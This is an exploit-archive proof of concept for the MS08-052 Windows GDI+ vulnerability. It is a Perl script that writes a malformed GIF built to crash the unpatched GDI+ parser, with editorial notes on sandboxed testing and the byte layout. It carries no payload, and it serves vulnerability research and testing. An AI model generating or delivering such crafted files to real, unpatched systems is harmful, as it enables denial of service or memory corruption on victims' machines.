
MS08-052 - MS Windows GDI+ Proof of Concept

MS08-052 - MS Windows GDI+ Proof of Concept

-----------------------------------------------------------------------------------------
Tested environment (as reported by the PoC author): Windows XP SP2
Gdiplus.dll Version: 5.1.3102.2180 (the pre-MS08-052 GDI+ build)

Caveat for anyone reproducing this: the script below only writes a malformed GIF (crash.gif) made of pattern bytes — it contains no payload and executes nothing itself. Render the resulting file only inside a disposable, isolated VM running the affected GDI+ build; do not open or preview it on a host you care about. Note also that the listing as published here has lost the backslashes from its "\xNN" escapes (it reads "x47x49..."); they must be restored or the script emits ASCII text instead of a GIF.

Credit:

John Smith,
Evil Fingers

GIF Template Reference: http://www.sweetscape.com/010editor/templates/files/GIFTemplate.bt

PoC Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability_ver2.txt

http://www.evilfingers.com/patchTuesday/PoC.php
========================================================================

#!/usr/bin/perl
#
use strict;
use warnings;

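# ---------------------------------------------------------------------------
# Build the malformed GIF byte string that the PoC writes out.
#
# Every escape must be a real "\xNN" escape. The listing as published on this
# page had the backslashes stripped ("x47x49..."), which is still valid Perl
# under `use strict` but yields the ASCII text "x47x49..." rather than the
# bytes -- the resulting file is not a GIF at all and reproduces nothing.
#
# Stream layout (section labels follow the PoC author's comments; the byte
# counts were re-derived from the listing):
#   "GIF89a" header ..................................    6 bytes
#   Logical Screen Descriptor ........................    7 bytes
#   Global Color Table (packed byte 0xF7 => 256 entries)  768 bytes
#   0x21 0x2C, 12 sub-blocks "21+1" (34 bytes each, #11 is 38 bytes),
#     0x00 terminator
#   0x21 0x2C, 5 sub-blocks "EC+1" (1 + 236 bytes each), 0x00 terminator
#   0x3B trailer
#   total ........................................... 2385 bytes
# ---------------------------------------------------------------------------

# Global Color Table: 256 entries of RGB (0x33, 0x33, 0x33).
my $color_table = "\x33" x 768;

# One 34-byte "21+1" sub-block without a 0x2C marker: 0x21 size byte followed
# by 33 bytes of alternating EC/21.
my $plain_block = "\x21\xEC" x 17;

# One "EC+1" sub-block: 0xEC size byte followed by 236 bytes of "ab".
my $ab_block = "\xEC" . ("\x61\x62" x 118);

my $gif =
    "\x47\x49\x46\x38\x39\x61" .        # GIF header "GIF89a"
    "\x65\x00\x65\x00\xF7\x0B\x0B" .    # Logical Screen Descriptor: 101x101, GCT present, 256 entries
    $color_table .                      # COLOR stream, 768 bytes
    "\x21" .                            ## Extension Introducer 0x21
    "\x2C" .                            ## Label 0x2C
    # Data sub-blocks (1), size 0x21 + 1. Sub-blocks 1, 4, 7 and 10 each carry
    # a single 0x2C in place of an 0xEC, three bytes earlier every time
    # (byte 29, 23, 17, 11 of the sub-block).
    #0
    $plain_block .
    #1
    "\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC" .
    "\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC" .
    "\x21\xEC" .
    #2
    $plain_block .
    #3
    $plain_block .
    #4
    "\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC" .
    "\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC\x21\xEC\x21\xEC\x21\xEC" .
    "\x21\xEC" .
    #5
    $plain_block .
    #6
    $plain_block .
    #7
    "\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC" .
    "\x21\x2C\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC" .
    "\x21\xEC" .
    #8
    $plain_block .
    #9
    $plain_block .
    #10
    "\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC\x21\xEC" .
    "\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC" .
    "\x21\xEC" .
    #11 -- NOTE(review): the tail 2C 00 00 00 00 0E 01 5A (plus the 0x00 that
    # follows) has the shape of an Image Descriptor (separator, left, top,
    # width 0x010E, height 0x005A) landing mid-stream; confirm against the
    # GIF template before relying on that reading.
    "\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC" .
    "\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x2C\x00\x00\x00\x00\x0E" .
    "\x01\x5A" .
    "\x00" .                            ## Terminator
    "\x21" .                            ## Extension Introducer 0x21
    "\x2C" .                            ## Label 0x2C
    # Data sub-blocks (2), size 0xEC + 1: five identical sub-blocks.
    ($ab_block x 5) .
    "\x00" .                            # Terminator
    "\x3B";                             # Trailer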

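# Write the PoC bytes to disk. The output path defaults to crash.gif in the
# current directory; an optional first argument overrides it so the file can
# be dropped straight onto a share mounted by the isolated test VM.
# Three-arg open with a lexical handle is required now that the path can come
# from @ARGV (the two-arg form lets a leading ">" or "|" change the mode).
# open and close are both checked: a buffered write error only surfaces at
# close, and a silently truncated file would look like "no crash".
my $out_path = @ARGV ? $ARGV[0] : 'crash.gif';
open(my $out, '>', $out_path) or die "open $out_path: $!";
binmode($out);
print {$out} $gif or die "write $out_path: $!";
close($out) or die "close $out_path: $!";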

# milw0rm.com [2008-10-09]
